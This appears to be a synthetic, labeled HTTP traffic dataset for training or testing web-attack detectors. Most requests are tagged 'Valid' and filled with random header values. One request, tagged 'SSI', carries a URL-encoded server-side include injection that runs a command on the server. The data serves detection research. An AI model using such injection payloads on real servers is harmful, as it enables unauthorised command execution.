Accept-Charset: cp-932, x-mac-greek, x-mac-chinesesimp;q=0.0
Accept-Encoding: 
Accept-Language: eelae-nufhw, sdplrqh-c;q=0.2, m-l, yhrlii-m
Cache-Control: ee=smcD
Client-ip: 146.143.28.253
Cookie: afHJGc=nasr8acp;jgsmhpinc=stegd;nrhn=yyz4RUVNzYE;ieome=de dwu1(in ;Stt6hh=816
Cookie2: $Version="0"
Date: Wed, 29 Jul 09 18:59:24 GMT
ETag: W/"UCqG8sTrPrBsCcr7vUF"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Sat, 27 Mar 04 19:39:19 UTC
If-Match: "dsqezla3Zlk5Dna"
If-None-Match: "wJZdEznWz3@__eR87A"
If-Range: Fri, 22 Jul 05 09:24:42 CET
Max-Forwards: 6405
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest opaque="shnm"
Range: 9547-817639
Referer: http://www.oybi.st/dPbmp/C7eefnSV/lodsyo.swf
TE: chunked;q=0.1,trailers
Trailer: From
User-Agent: Mozilla/2.5 (Windows; U; Win98 4.0; si-an; rv:6.1.6) Gecko/46187492
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4532x5831
Via: kaezOt/6.6 www.cBjh.jpeg
Transfer-Encoding: gzip
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47460
Start - Id: 18485
class: Valid
GET /dTA-DKnK217ltEd/8N/osar8iC/afBL/znRN41-9_X4oIB7Qq/7lkHdiqo_4fS18vv/o8aXDofbzpEB-Hmn@YDq/rLAdGactyV/1x7mailjJprocessing-instructionYS0K424/pofoc/jNapOoaLIS_CBpV_qr-a/n0qSsbxL.QJi.html?rip5zsv=%27c&nf2nna5=syaiz1dghoiojlner&do3rtgraaij0eb=0bgedLtnhctoi&OM1HQkbyjW=d6Orhtra5eeTrRkrl&sms=h+hs&Rm4ail6ecoimunw=21591976&gvya=nodebm%28p%25iframe7bv6coqdsock_streamae&essloOnlNtrvl=g9.W1M&winba0noi6mg=g+saroncopynv%3AiebewnteI&syoomvhxaelGaN=vmk0148_&1hskeE8=ItrpmoltolEwuyh&mKErAdHdVQU=61140&Pshtifekdrc3ns=Iyn8el0rTba&mt=ptyosqnEtsr&tiaq0oo=dautoexec HTTP/1.1
Host: 255.133.203.52:80
Connection: edelEo
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: h6si4O-ea2g;q=0.5
Cache-Control: oNe='c7hGao'
Client-ip: 117.52.42.62
Cookie: AmVXQ=rcodeAmeasbsa;Nhjrh=siupedcosSiiR%ut;swe=1979;anu6seiauaoUds=ett;ewaulEkwias5sn=mPVM;nnycsaqSorne=pWen
Cookie2: $Version="70"
Date: Sat, 03 Dec 05 15:45:21 CET
ETag: "zC_Gbw0I@rlmjM763u."
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Sun, 31 May 09 20:28:07 CET
If-Unmodified-Since: Fri, 31 Dec 04 20:53:41 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Jan 10 06:13:08 GMT
Max-Forwards: 3
MIME-Version: 1.9
Pragma: N=ai4tsgu9
Proxy-Authorization: Basic aWVoVGh1ZXQ6YW9oaA==
Authorization: NTLM amVsODJuZWVCdXR5ZVJva2F4b25kb1JudXNzd2lpNHNvdWFkOA==
Range: 7-,-428485,871762-
Referer: http://7pewnna.be/ajrhlc/totR5oo/ep7Ear/spat/ws8oau.conf
TE: chunked,trailers,trailers
Trailer: Max-Forwards
User-Agent: u17oiht552 (tNuZjnz; yJcivQ; tA02ngl.8v; dvv03iUc5e; enJYsr)
UA-CPU: x86
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 934x751
Via: 9.0 www.ioir.png:64, FTP/9.5 50.176.165.201, 9.0 37.161.64.10
Transfer-Encoding: deflate
Upgrade: obxu/3.0
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18485
Start - Id: 34684
class: Valid
POST /nafx3rcuU/rgb/wmYcanrw1ietto/rOd2kVc.rZ.q.AjQh.exe? HTTP/1.0
Content-Length: 59
Content-Language: cmuMgzs
Content-Encoding: identity
Content-Location: /SdgoL/deedn4/laov8E/ag45sgwe/tnTmn.js
Content-MD5: bTlrdGI0dWVlZVNhZkYyeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Sep 08 23:02:32 GMT
Last-Modified: Tue, 28 Aug 07 10:46:27 CET
Host: 180.170.225.152:80
Connection: keep-alive
Accept: image/*;q=0.2, video/quicktime;q=0.8
Accept-Charset: iso-2022-kr, iso-8859-9;q=0.2, iso-8859-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 177.78.76.149
Cookie: atfd8J8wopwv5=808811
Cookie2: $Version="7"
Date: Tue, 13 Jun 06 21:03:23 CET
ETag: W/"v.Ny_AG_GWQp1sFZ"
Expect: 100-continue
From: oysyelN@agoe.uk
If-Modified-Since: Tue, 02 Dec 08 09:10:47 CET
If-Unmodified-Since: Sun, 06 Aug 06 23:53:31 CET
If-Match: "3fm1EDxVVhxbQ8vI"
If-None-Match: "msnWd46t1oVbH-jRZuj"
If-Range: Sat, 01 Mar 08 05:07:42 UTC
Max-Forwards: 7942
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM TmlpbHlyMWNpY3dwb2NiZmtHb2kxZWJpY2V0bW90ZGRpaWFyaGhicm9l
Authorization: Digest nc=5fD5Fa93
Range: -08
Referer: http://www.trmioiie.st/mjijai/toearo4c/ehonhe/Lhzror/oueRntba.aspx
TE: trailers,deflate
Trailer: Warning
User-Agent: rolE3 (h@37Cv4g; ncnljd8Ma; tNfDBTn; imCG8p-zY.)
UA-CPU: MIPS
UA-Disp: 081,3578,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0894x8053
Via: HTTP/9.0 www.coTy.jpeg, 3.8 238.124.238.43, 7.4 171.152.240.148
Transfer-Encoding: identity
Upgrade: nq8o/9.4, hsea/1.7
Warning: 564 227.232.75.206 "aanjrmUlanomoe3ltr" 
X-Forwarded-For: 31.11.86.231
X-Serial-Number: 30358
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

AeGO4udiv3j=lib&oaiot6enfgt=tND7o3EA&eiir8=$es&nil0sbv=33

End - Id: 34684
Start - Id: 25387
class: Valid
GET /WFB/tf_gP9f4dKE/5nyk._telnetWh/dttsN/_K/eauihl0mehtreh2Tah/ePeT.6wbBOTh5ny@v.D8.php4?hZtwlrrvges=Jtmbiadera6fn8ti&5undLlmu=377820&7yaeeklt=thUQA&7ae6hi=316999 HTTP/1.1
Host: www.aoeEo.cz
Connection: meepbP91
Accept: */*;q=0.3
Accept-Charset: iso-8859-8-i;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 99.191.189.189
Cookie: osOhortejgns=7668675;rzaiheoot1i=ndMtdtinrhzb~window.opendba
Cookie2: $Version="4"
Date: Sun, 05 Apr 09 22:23:19 GMT
ETag: W/"Z2pOfs9CyNAb1oA"
Expect: 100-continue
From: drrovE@debi2e.fr
If-Modified-Since: Mon, 05 Sep 05 14:01:25 GMT
If-Unmodified-Since: Wed, 13 May 09 22:04:41 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Mar 05 22:15:38 GMT
Max-Forwards: 0
MIME-Version: 3.1
Pragma: 94aO=tec4t
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: Digest response="Df2C3a0Edb29e86C1Cd76A9Bb2E2fF0b"
Range: 047-,776-
Referer: /etbsoi.php
TE: chunked
Trailer: Upgrade
User-Agent: cUUOQi@Rb http://www.hhtu6mis.net
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: gzip
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 361 189.181.68.53 "fIjyiokT66aez" "Tue, 06 Apr 10 13:42:10 UTC"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 927015568705209514
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25387
Start - Id: 23356
class: Valid
GET /sEnjiesorue.aspx?laQmgopQhSntldn=234091&optnoS=42846&6iIshiBc=%5CHaC%7Ce&sCfromYz=n%7Cs&aspnmfSu=Eidc1hxngza&2g9wVwp-rmo.E0dP=%40%25+aa&OGoOeT=rOz6.Z HTTP/1.0
Host: 227.120.252.103
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: haovu-6rnsE;q=0.0
Cache-Control: nqnar=lt6tt
Client-ip: 253.173.161.120
Cookie: lfr4gDczWP.w=2675456;o1iotdt9yn=rde;Oo=4022
Cookie2: $Version="5"
Date: Sun, 18 Oct 09 22:35:58 UTC
ETag: W/"VJMG@zC_AoJVokypG4y"
Expect: 100-continue
From: atnntia@abdb.com
If-Modified-Since: Sat, 20 Jan 07 04:22:17 GMT
If-Unmodified-Since: Thu, 29 Nov 07 20:57:44 GMT
If-Match: *
If-None-Match: *
If-Range: "5E2Ina683mOTSusJk90y"
Max-Forwards: 35
MIME-Version: 1.8
Pragma: jVafcnn=0
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: tely Nkxo8iE=7tmeoIkc
Range: -34442
Referer: http://euon.cz/uaemu81s/aht1ord.php3
TE: trailers,gzip;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 9.5; io-iA; rv:1.6.0) Gecko/35111302
UA-CPU: StrongARM
UA-Disp: 611,430,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 026x806
Via: 3.9 250.13.205.204, 8.9 www.potseatn.png:67991, oreIb/4.9 84.154.112.73
Transfer-Encoding: gzip
Upgrade: rseahb/4.1
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 0696294106219
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23356
Start - Id: 40274
class: SSI
GET /ecAmj/pituol3Ub0/oHJfn/vbscriptIUA9ZbgsoundXbHNCadmin/rfaeasemmroesi0/4MUobjectxWuOWnXXM5H/tpewOciwdEe/mbntidtiaeeega/eBXwFgmx/xif4C6G7jU7.cgi?taWe8ea5roW=6559037913&vcrI=%3C%21--+++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Ch1sdbttlf%5CEeinscte%5Coyeon.exe+d%3A%5Cre5aDls%5Cwww.llmellolro.org%5CTaeoetir%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E&linerruE=edte&ljuanc=+naqm20oo2la&Le=a+tx0aeubi&bwri1Koetue=3099&ayatkkje=ct%7Cphw7pwinntQ59&se6ae=mailhx HTTP/1.0
Host: www.tohsttydee.ch
Connection: BA3urrii
Accept: video/quicktime;q=0.7, audio/*
Accept-Charset: x-mac-korean;q=0.0, euc-kr;q=0.4, iso-8859-5;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 8.205.171.214
Cookie: uihp=%;ele0onAsa1alsu=eIuE~window.openod tto3execowanxaccept;AwcsAivoalte=4115574183;pdvaLetooseza=opmntshtpinOae
Cookie2: $Version="114"
Date: Fri, 14 Nov 08 10:49:57 UTC
ETag: W/"PvC@pDiEamK-qycb0"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Thu, 15 May 08 17:23:14 UTC
If-Unmodified-Since: Sat, 22 Oct 05 03:31:29 GMT
If-Match: *
If-None-Match: "rJaoUeyQMdy__fXb6VC"
If-Range: "@0tI_RimpK4NvSfA"
Max-Forwards: 58
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest nc=4FCdffE7
Range: 1030-
Referer: http://amts.cz/uund/Tta4t/0tuceSt/loeliyE/doec5gm.css
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/0.3 (compatible; aeia; Win98; welhM9eado; sjdnctw)
UA-CPU: MIPS
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 8.3 www.goettee4.shtml, FTP/6.3 www.3et9mro.shtml, 9.5 85.255.95.34
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 234.200.110.255
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40274
Start - Id: 34164
class: Valid
POST /iaV/salp/i1l3DUG_ZfD/rUX9uIQxWSIXSee4Glge/-YlNJbinumH4/nd0QdUU0z1Yp-FxKJF.css? HTTP/1.1
Content-Length: 252
Content-Language: daar,irr
Content-Encoding: compress
Content-Location: http://www.etsoj.ch/oe7seP/bkzpAiat/o8np.shtml
Content-MD5: dHlJbGVZbmRlbm1nT21Eeg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Mon, 14 Jun 04 11:46:38 UTC
Host: 93.177.210.128
Connection: l2oT
Accept: text/*
Accept-Charset: x-mac-korean, x-mac-hebrew, x-mac-turkish, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 229.106.129.24
Cookie: a2dasrelQlsot=u;irhtalenmonsen=otIez;hfr6im=47665833;Toeoaot=5076915994
Cookie2: $Version="00"
Date: Sun, 08 Mar 09 11:12:09 GMT
ETag: "W6RIxcRFJaUsrHepwgOU"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Tue, 29 Mar 05 20:05:11 CET
If-Unmodified-Since: Sat, 11 Nov 06 22:24:56 CET
If-Match: "6gJ6zxAjsLt5aUjWoNI"
If-None-Match: "-EKiJU11uKCir9FMjodf"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: NTLM cnFpMzNzSGJoZG9ob3VhYWF0clRyYWVyZnR0YWVpNHN6elhl
Range: 713-,7885-54
Referer: /u556ba/rtnntm/rOlnntr.shtml
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/3.0 (Windows; U; Windows NT 9.0; jr-oa; rv:2.8.9) Gecko/49199662
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 995x590
Via: 6.4 www.ifmonntr.css
Transfer-Encoding: deflate
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 124.239.210.255
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

L4ySMqKHgOK_=2OO5YSbY&tyRocees6eoknfa=lhttps&U5piGu=6430297&eTi=Doa=&sbddsmngn=391643&veoAidolti=260&a9zet=tie&l8asc=iNZlrd&nteSa=ePEz&lXYdp0gP=vYw3ttAi/i>tasa(l[s+&8Qniaroi=86679450&ZeNoqVw1ql4iframe=pnwindow.openLn&eEmpehene2ee3ai=8373236

End - Id: 34164
Start - Id: 31182
class: Valid
GET /gQ4EvuOHmt@mJms9f/d0l./2eCJ7etcX.jpg?unaf=13&scnorcera=7&1llOa0=redrs&ilrf=aq+8%7En&enlkaaeeshs=prps&CxtermvURF=Zcfa&nsoEeaoawtw3=sraooreP&YetuearYrdht5=tX53uJGJt&netnp3er=elfetqo2mmi9a1o HTTP/1.0
Host: 204.19.76.14
Connection: ht6mno
Accept: audio/x-wav;q=0.4
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: aci-la8a, t-i0Eemaf;q=0.9
Cache-Control: no-transform
Client-ip: 169.110.50.17
Cookie: ohenfch=262308562;p13R3dOprocessing-instructionZ=18;ZKUbinOU84=6715496;c4fnic=297788;dtsa5=u;sbloTeUsnrOm=bW5Xq
Cookie2: $Version="9"
Date: Sat, 08 Oct 05 18:49:04 GMT
ETag: "JHsdapb1As9.D7D6."
Expect: 100-continue
From: 2pun@ildgulxsU.uk
If-Modified-Since: Sat, 14 Jun 08 07:39:28 GMT
If-Unmodified-Since: Mon, 11 Feb 08 05:24:20 CET
If-Match: "-K1rn1xN1xhMYKP2kTI"
If-None-Match: "oovROJ9XUkH.ucekb.k"
If-Range: "@bnvwcIxEHXwQMg"
Max-Forwards: 487
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: ctTp aEEckmc=a1trp
Range: 487-253698,1-,198-1
Referer: /0raTaeh/eelu/RbI1bEg/nomIa.nsf
TE: trailers,chunked;q=0.9
Trailer: Expect
User-Agent: lehletnjctlnu
UA-CPU: StrongARM
UA-Disp: 056,6829,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3376x378
Via: HTTP/0.9 241.237.132.179, 3.2 10.89.55.37
Transfer-Encoding: compress
Upgrade: brmCe/3.7, du9/1.2, int/6.8, n1wopd/2.2
Warning: 628 7.107.154.223 "19aoiihha" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 251100
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31182
Start - Id: 9268
class: Valid
GET /cs/oIMR0CVGyqWLhtaccesa/AbIRlinkNS/gOhpkKLNHGdaUGKGLP/au9qdD/vj/sejsantsg/m1o6def/vNDautoexecusrIPrmsGXviR/m9W3jSUhV9/br/s_d.vYJVdPzuRmCx0.tiff?qgaNtadiiso=q&nw9tn2d=0348153507&2HacLICBolm=9&lLniaxnm=0385714&1sfttipsd=%29hZnad&2tx=uahttpoiesa6Dclge%24ed%2B HTTP/1.0
Host: 59.153.103.29:56
Connection: close
Accept: image/jpeg;q=0.3, image/*
Accept-Charset: iso-8859-5;q=0.8, windows-1255;q=0.5, iso-8859-8-i
Accept-Encoding: compress, gzip;q=0.7, deflate;q=0.6, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 126.233.178.83
Cookie: eparothd=hcNg1lrreoro;pJnfromEq=0909469;mB61lKu=61;ewrp3reeqhhm=tmRh4dnesghomennw
Cookie2: $Version="49"
Date: Tue, 27 Apr 04 03:12:24 GMT
ETag: "umo@w1e_ztI5__E."
Expect: vt4hih9=nniom4e
From: vsdit@a9hosdr9ad.fr
If-Modified-Since: Fri, 21 Jan 05 09:57:03 UTC
If-Unmodified-Since: Fri, 17 Oct 08 12:20:54 CET
If-Match: *
If-None-Match: *
If-Range: "Jg1Dodfy9feXJRK"
Max-Forwards: 815
MIME-Version: 4.6
Pragma: ni='h'
Proxy-Authorization: Basic ZWVpdGVhOm94bm8=
Authorization: Basic bWNjczpCYTIydGFu
Range: 30-703,-64,-521
Referer: http://www.iqdu.de/hceggian/xee9deon/o0lttHru/gido/sweain.asp
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/1.9 (Windows; U; Win98 5.8; ai-bm; rv:4.9.1) Gecko/88239332
UA-CPU: 68000
UA-Disp: 5586,668,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 476x394
Via: FTP/4.2 41.16.160.161, 2.7 255.240.17.10, 7.8 www.H2ls.tiff
Transfer-Encoding: compress
Upgrade: Vdnis/0.0, da08do/9.0
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9268
Start - Id: 24641
class: Valid
GET /2ri1EEqgIiV/vE-bm2/eyQ_5winBQ/oNnY/0EdOsisZnnk@40_4kVW/acceptphpbsiE__lp/oezMsJCxlKxz9f9f/aPN6jgQFYNzYn/S51scriptCechoUlV8ZuJKn/pyeIh/eUQJF-0cQk.htm?yl=301&islie7c3T=378&su=l3L&eoi3oZeatlx=sdh6s&oEeaanjeaao1h=qsuinevfltyht&djCifktehgae=P%3Bti&nod7an=oiHzsUe HTTP/1.1
Host: 20.6.30.87
Connection: uuyh
Accept: */*;q=0.1
Accept-Charset: gb2312, iso-8859-15, cp-950
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 188.128.171.94
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="479"
Date: Tue, 08 Jul 08 22:55:07 CET
ETag: "amWvdIHGFvLfQdm"
Expect: 100-continue
From: fmet44t@idw1orkL6v.uk
If-Modified-Since: Fri, 30 Jun 06 05:24:35 CET
If-Unmodified-Since: Wed, 14 Jun 06 20:14:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM aWhhdG5oR3dsaXRuMWE4dVR2enN4Qnc2Y25xaXJlYWNheGU=
Authorization: Basic YW5TY2FlZDpFc2hsbw==
Range: 631670-990,0718-
Referer: http://7ws5one.ch/oybe/idaga1s.aspx
TE: gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 6.9; u9-ke; rv:6.8.1) Gecko/89944209
UA-CPU: StrongARM
UA-Disp: 7015,359,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 803x2211
Via: 9tahi/4.3 www.tE5eede.js:3210, FTP/3.4 www.t9a0E.css, ispSd/0.3 www.fOwdeafn.jpeg
Transfer-Encoding: compress
Upgrade: erm/1.1, qamkie/3.0, 4Eloit/4.3, e8iif/6.9
Warning: 846 www.iihrevae.gif "eaehIhsswntnhuios8" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24641
Start - Id: 28426
class: Valid
GET /a8OtAimstrsftiIo/lam1lutqecd5shh/o0pLOBlQT2/oK-_pc-8moMRM_nLry/wtgyenenhwcatu/heIct2rEi3aen/aT4it/nsUMxRYgg.html?yt.I=+ke+o&al2araiuoo=gOt&dnY7WXuStmpcni=iausrn&cgeisop=%5CubedX+httpobMa&c9ewhaol=tuh&6bcmailZ5rconnectw=edeRnjnulla&ahnaVCSsrm=Z+t5kin0tte&ontnasaots=1092378&mr=luiao&istgetti8ee=41374&ehoSesnst=xmliatso&CVlOg=sirlhR&aKdEDscript=1&roktuwElOefhagA=s7oWt5&Gj80echo=kiI6rm9s2Poi HTTP/1.1
Host: 108.101.156.249
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.4, compress, gzip, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 218.83.162.0
Cookie: cylouL7h=between]qo ttt  ranhtpassrO&e ;Abt=19;seasg=0428877554;kQlLcumnzpr1=str
Cookie2: $Version="80"
Date: Sun, 15 Aug 04 14:33:26 UTC
ETag: "iDpU2wJ..PsGKz9YRaoC"
Expect: 100-continue
From: oBcae9t@txO3eond.biz
If-Modified-Since: Thu, 30 Aug 07 20:10:10 UTC
If-Unmodified-Since: Wed, 13 Oct 04 11:31:35 CET
If-Match: "zMDQ5Mfl9MXaYzRf"
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:39:23 UTC
Max-Forwards: 3
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic TDcxeWh0OmV0N2F0bmVl
Authorization: Digest realm
Range: 9246-,43437-,-51100
Referer: http://cAeapmrF.uk/eeyRRiuo/esko/gmhosa1r.shtml
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.6 (compatible; 6etggs; Unix; tOltTcre9O)
UA-CPU: 68000
UA-Disp: 4475,557,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6329x3487
Via: 1.4 www.eaty2w.html, HTTP/9.7 www.Sodkzny.png, 14gina/3.8 www.iace.jpg
Transfer-Encoding: gzip
Upgrade: fioa/5.4, weeo/7.8, l0s/3.4, srerh/3.7
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28426
Start - Id: 12705
class: Valid
GET /i9JKekxz.MftJ7/9i/txa-dzNM/dmT0j86yQf/rOCnedrg/r@vY8DgV/xcyco.php4? HTTP/1.1
Host: www.purPjA.uk
Connection: ewtpa9eI
Accept: text/plain;q=0.5, application/postscript;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity;q=0.5, deflate, identity;q=0.8, identity;q=0.8
Accept-Language: *
Cache-Control: td1='gAedw3'
Client-ip: 27.20.13.142
Cookie: eaycnl=06438
Cookie2: $Version="91"
Date: Sat, 06 Feb 10 01:06:41 UTC
ETag: W/"ef7Y_SliiiXwhzm"
Expect: seWtosYh
From: aIsia@oetle.org
If-Modified-Since: Fri, 17 Dec 04 15:20:27 UTC
If-Unmodified-Since: Fri, 14 Mar 08 01:50:46 UTC
If-Match: "OJ9HCFUaQeWWWlV"
If-None-Match: "YEel@C854_hKFhbvT"
If-Range: Wed, 06 Aug 08 22:54:10 GMT
Max-Forwards: 22
MIME-Version: 5.1
Pragma: hTm='E7Syr'
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: Digest qop=auth
Range: 9092-,513-7
Referer: http://www.ctue.be/5pdWnmo/een9rp/oy2ho.txt
TE: deflate,gzip
Trailer: Authorization
User-Agent: Mozilla/8.9 (Windows; U; Win98 3.5; t4-hs; rv:8.8.5) Gecko/62737512
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 072x109
Via: 5.8 www.teu0ahR.html
Transfer-Encoding: deflate
Upgrade: hlvieb/6.1, ea8O/4.9, dmeXre/8.7, htt5c/9.5
Warning: 566 www.iaages.png "ihfood" "Thu, 27 Jan 05 04:38:01 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12705
Start - Id: 17334
class: Valid
GET /home4o79JobjectBHdropYStelnetR7/whtAwety/VCJN4r6t_c4Pid/nF.ob/u_zg@dL/rvGq.htm?rtYAteuP4ttdou=A6ddL&itus0eKe=27&sies0i9aterlie=ussD&yh=il1u3vreplacesgun&zlBo1okague=2999490&mpositionC6RT=ioqiayalutnI&fihDaq0L8e=psmdAosh+0A&OitrSinssM=Tsrneyzoai&Utaweeoa=9283037&egdae=2&dtea1moolsf=i&ke=60&AbL=992008 HTTP/1.0
Host: www.gucB.cz
Connection: close
Accept: video/*;q=0.7, audio/*, image/jpeg
Accept-Charset: x-mac-roman;q=0.0, iso-8859-7, gb2312;q=0.7
Accept-Encoding: 
Accept-Language: 1n-TiA;q=0.8, 8oa5rl-sha;q=0.8, on-e
Cache-Control: only-if-cached
Client-ip: 97.249.225.22
Cookie: dndybodruaa=A 9s;nomnwsomrw3e=nxg;TOrhtntso=1rdivim;7oapeo4pFdehC=i@LmnGYoV9;BX-vco8UT=snfscriptw0e4tewRnctekt3;iohim=eIteawun
Cookie2: $Version="3"
Date: Sun, 13 Dec 09 12:41:30 GMT
ETag: W/"TfYClwrZHSZe-qIOZ5g"
Expect: 100-continue
From: 1rsdas@zamn2no.de
If-Modified-Since: Thu, 17 Dec 09 13:31:25 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:42:10 UTC
If-Match: "4c7@NLxRmvqpVpE1t5sn"
If-None-Match: *
If-Range: "6zxEAMwvFoZaGmly2G"
Max-Forwards: 06
MIME-Version: 6.6
Pragma: nAgOorh=coNe
Proxy-Authorization: Digest realm
Authorization: Digest qop=aeeuu
Range: 570800-
Referer: /sfdOO0Kh/8earem9d.mpg
TE: deflate,trailers,deflate
Trailer: Range
User-Agent: Mozilla/6.5 (Windows; U; WinNT 2.0; tc-vW; rv:6.1.1) Gecko/75314999
UA-CPU: 68000
UA-Disp: 7547,506,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 455x7663
Via: 1.5 www.0csAr.htm
Transfer-Encoding: gzip
Upgrade: tc3/9.1
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 75371955994853740
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17334
Start - Id: 18376
class: Valid
